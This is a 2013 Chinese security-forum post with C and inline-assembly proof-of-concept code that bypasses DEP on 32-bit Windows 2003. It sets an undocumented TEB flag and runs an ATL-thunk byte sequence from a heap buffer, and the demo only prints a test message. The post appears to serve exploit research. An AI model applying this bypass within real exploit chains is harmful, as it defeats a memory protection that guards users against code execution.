-
-
[原创]windows 2003 dep 鸡肋 bypass DEMO
-
发表于: 2013-5-22 09:12
-
原理参考
http://bbs.pediy.com/showthread.php?t=172034
有图有真像
http://bbs.pediy.com/showthread.php?t=172034
#include <Windows.h>
#include <stdio.h>
void dep_bypass(void)
{
printf("dep_bypass test ok!\n");
}
/*
* windows dep bypass by boywhp@126.com
* http://bbs.pediy.com/showthread.php?t=172034
*/
int main(int argc, char** argv)
{
PBYTE iniBuf = malloc(0x200);
DWORD handler = (DWORD)dep_bypass;
DWORD offset = handler - ((DWORD)iniBuf + 10);
PVOID teb = NULL;
/*
DWORD oldProtect;
if (!VirtualProtect(iniBuf, 0x200, PAGE_EXECUTE_READWRITE, &oldProtect))
printf("VirtualProtect error:%d!", GetLastError());
*/
__asm {
mov eax, FS:0x18;
mov teb, eax;
}
/*
* windows 2003 X86 dep
* teb offset 0xfb8 ->SafeThunckCall
*/
*((PBYTE)teb + 0xfb8) = TRUE; //set peb->safeThunckCall = TRUE
memset(iniBuf, 0x90, 0x200);
//ATL thunk2
iniBuf[0] = 0xb9;
*(PULONG)(iniBuf + 1) = 0xcccc; // mov ecx, imm32
iniBuf[5] = 0xe9; // jmp imm32
*(PULONG)(iniBuf + 6) = offset;
((void(*)(void))iniBuf)();
getch();
return 0;
}
有图有真像
[培训]《安卓高级研修班(网课)》月薪三万计划,掌握调试、分析还原ollvm、vmp的方法,定制art虚拟机自动化脱壳的方法
